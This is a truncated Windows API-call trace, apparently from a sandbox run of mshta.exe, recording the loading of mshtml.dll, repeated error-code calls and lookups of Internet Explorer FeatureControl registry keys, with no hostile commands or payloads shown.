[0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.745] GetLastError () returned 0x0 [0060.745] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.746] SetLastError (dwErrCode=0x0) [0060.746] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.747] SetLastError (dwErrCode=0x0) [0060.747] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 
[0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.748] GetLastError () returned 0x0 [0060.748] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.749] SetLastError (dwErrCode=0x0) [0060.749] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.750] GetLastError () returned 0x0 [0060.750] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 
[0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.751] GetLastError () returned 0x0 [0060.751] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.752] SetLastError (dwErrCode=0x0) [0060.752] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.753] SetLastError (dwErrCode=0x0) [0060.753] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 [0060.754] SetLastError (dwErrCode=0x0) [0060.754] GetLastError () returned 0x0 
[0060.755] SetLastError (dwErrCode=0x0) [0060.755] GetLastError () returned 0x0 [0060.755] SetLastError (dwErrCode=0x0) [0060.755] GetLastError () returned 0x0 [0060.755] SetLastError (dwErrCode=0x0) [0060.755] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x5fc) returned 0x5a17e0 [0060.755] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a0e78 | out: hHeap=0x5a0000) returned 1 [0060.757] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x972aef) returned 0x0 [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.757] GetLastError () returned 0x0 [0060.757] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetLastError () returned 0x0 [0060.758] SetLastError (dwErrCode=0x0) [0060.758] GetVersion () returned 0x1db10106 [0060.758] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0060.758] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0060.758] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0060.758] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x105) returned 0x5a1de8 [0060.758] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x105) returned 0x5a0e78 [0060.758] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x18f944 | out: phkResult=0x18f944*=0x42) returned 0x0 [0060.759] RegQueryValueExA (in: hKey=0x42, 
lpValueName=0x0, lpReserved=0x0, lpType=0x18f93c, lpData=0x5a1de8, lpcbData=0x18f938*=0x105 | out: lpType=0x18f93c*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x18f938*=0x1f) returned 0x0 [0060.759] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x74af0000 [0064.988] GetProcessHeap () returned 0x610000 [0064.988] GetVersion () returned 0x1db10106 [0064.988] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0064.988] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0064.988] HeapSetInformation (HeapHandle=0x610000, HeapInformationClass=0x0, HeapInformation=0x18f5d0, HeapInformationLength=0x4) returned 1 [0064.989] malloc (_Size=0x80) returned 0x3b2640 [0064.989] GetVersion () returned 0x1db10106 [0064.989] GetVersionExA (in: lpVersionInformation=0x18f4a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f4a8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0064.989] __dllonexit () returned 0x74d1717c [0064.989] __dllonexit () returned 0x74d173bd [0064.989] GetProcessHeap () returned 0x610000 [0064.990] __dllonexit () returned 0x74d17435 [0064.990] __dllonexit () returned 0x74d16e75 [0064.990] __dllonexit () returned 0x74d16ff5 [0064.990] __dllonexit () returned 0x74d171be [0064.990] __dllonexit () returned 0x74d172e2 [0064.990] __dllonexit () returned 0x74d17320 [0064.990] __dllonexit () returned 0x74d17370 [0064.990] __dllonexit () returned 0x74d16e53 [0064.991] __dllonexit () returned 0x74d16e66 [0064.991] __dllonexit () returned 0x74d16a3e [0064.991] __dllonexit () returned 0x74d16a46 [0064.991] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.991] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc16e [0064.991] __dllonexit () 
returned 0x74d16a60 [0064.991] __dllonexit () returned 0x74d16a7a [0064.991] __dllonexit () returned 0x74d16a93 [0064.991] __dllonexit () returned 0x74d16aa7 [0064.991] __dllonexit () returned 0x74d16ac1 [0064.992] __dllonexit () returned 0x74d171f1 [0064.992] __dllonexit () returned 0x74d16ad0 [0064.992] __dllonexit () returned 0x74d16adf [0064.992] __dllonexit () returned 0x74d16aee [0064.992] __dllonexit () returned 0x74d16afd [0064.992] __dllonexit () returned 0x74d16b0d [0064.992] __dllonexit () returned 0x74d1720c [0064.992] __dllonexit () returned 0x74d16b1c [0064.992] __dllonexit () returned 0x74d16b2f [0064.993] __dllonexit () returned 0x74d16b49 [0064.993] __dllonexit () returned 0x74d16b58 [0064.993] __dllonexit () returned 0x74d16b67 [0064.993] __dllonexit () returned 0x74d16b76 [0064.993] __dllonexit () returned 0x74d16b85 [0064.993] __dllonexit () returned 0x74d16b94 [0064.993] __dllonexit () returned 0x74d16ba3 [0064.993] __dllonexit () returned 0x74d16bb2 [0064.993] __dllonexit () returned 0x74d16bc1 [0064.993] __dllonexit () returned 0x74d16bd0 [0064.994] __dllonexit () returned 0x74d16bdf [0064.994] __dllonexit () returned 0x74d16bee [0064.994] __dllonexit () returned 0x74d16bfd [0064.994] __dllonexit () returned 0x74d16c0c [0064.994] __dllonexit () returned 0x74d16c1b [0064.994] __dllonexit () returned 0x74d16c2a [0064.994] __dllonexit () returned 0x74d16c3d [0064.994] __dllonexit () returned 0x74d16c4c [0064.994] __dllonexit () returned 0x74d16c5b [0064.995] __dllonexit () returned 0x74d16c75 [0064.995] __dllonexit () returned 0x74d16c8f [0064.995] __dllonexit () returned 0x74d16ca9 [0064.995] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.995] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0064.995] __dllonexit () returned 0x74d16cb1 [0064.996] __dllonexit () returned 0x74d17294 [0064.996] __dllonexit () returned 0x74d16ccb [0064.996] __dllonexit () returned 0x74d16cd3 
[0064.996] __dllonexit () returned 0x74d16ce2 [0064.996] __dllonexit () returned 0x74d16cf1 [0064.996] __dllonexit () returned 0x74d16d00 [0064.996] __dllonexit () returned 0x74d0f72d [0064.996] __dllonexit () returned 0x74d16d43 [0064.997] __dllonexit () returned 0x74d16d56 [0064.997] __dllonexit () returned 0x74d0f095 [0064.997] __dllonexit () returned 0x74d16d65 [0064.997] __dllonexit () returned 0x74d16d78 [0064.997] __dllonexit () returned 0x74d16d87 [0064.997] __dllonexit () returned 0x74d16d9a [0064.997] __dllonexit () returned 0x74d12256 [0064.998] __dllonexit () returned 0x74d1679d [0064.998] __dllonexit () returned 0x74d16dd5 [0064.998] __dllonexit () returned 0x74d16df8 [0064.998] __dllonexit () returned 0x74d16e07 [0064.998] __dllonexit () returned 0x74d176cb [0064.998] __dllonexit () returned 0x74d16e1a [0064.998] __dllonexit () returned 0x74d172aa [0064.998] __dllonexit () returned 0x74d172cb [0064.999] __dllonexit () returned 0x74d16e3a [0064.999] GetCurrentThreadId () returned 0x2a8 [0064.999] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xba75a517, Data2=0x7509, Data3=0x4d6f, Data4=([0]=0x96, [1]=0x2c, [2]=0xfd, [3]=0xfb, [4]=0xcb, [5]=0x3f, [6]=0x37, [7]=0x6a))) returned 0x0 [0065.001] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x200) returned 0x62e740 [0065.001] __dllonexit () returned 0x74d1733d [0065.001] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ef48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.001] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.001] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0065.001] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0065.001] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x62e948 [0065.001] SHRegGetValueW () returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f194 | out: phkResult=0x18f194*=0x0) returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f190 | out: phkResult=0x18f190*=0x0) returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.084] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.089] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.089] RegCloseKey (hKey=0x0) returned 0x6 [0065.089] RegCloseKey (hKey=0x0) returned 0x6 [0065.089] RegCloseKey (hKey=0x94) returned 0x0 [0065.089] RegCloseKey (hKey=0x98) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, 
samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x98) returned 0x0 [0065.090] RegCloseKey (hKey=0x94) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x94) returned 0x0 [0065.090] RegCloseKey (hKey=0x98) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, 
phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.091] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x9c) returned 0x0 [0065.091] SHRegGetValueW () returned 0x2 [0065.091] SHRegGetValueW () returned 0x2 [0065.091] RegCloseKey (hKey=0x9c) returned 0x0 [0065.091] RegCloseKey (hKey=0x0) returned 0x6 [0065.091] RegCloseKey (hKey=0x0) returned 0x6 [0065.091] RegCloseKey (hKey=0x98) returned 0x0 [0065.091] RegCloseKey (hKey=0x94) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.092] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.092] RegCloseKey (hKey=0x0) returned 0x6 [0065.092] RegCloseKey (hKey=0x0) returned 0x6 [0065.092] RegCloseKey (hKey=0x94) returned 0x0 [0065.092] RegCloseKey (hKey=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: 
hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.093] RegCloseKey (hKey=0x98) returned 0x0 [0065.093] RegCloseKey (hKey=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x94) returned 0x0 [0065.094] RegCloseKey (hKey=0x98) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x94, 
lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.094] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x98) returned 0x0 [0065.094] RegCloseKey (hKey=0x94) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.095] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.095] RegCloseKey (hKey=0x0) returned 0x6 [0065.095] RegCloseKey (hKey=0x0) returned 0x6 [0065.095] RegCloseKey (hKey=0x94) returned 0x0 [0065.095] RegCloseKey (hKey=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x94, 
lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x98) returned 0x0 [0065.096] RegCloseKey (hKey=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x94) returned 0x0 [0065.097] RegCloseKey (hKey=0x98) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, 
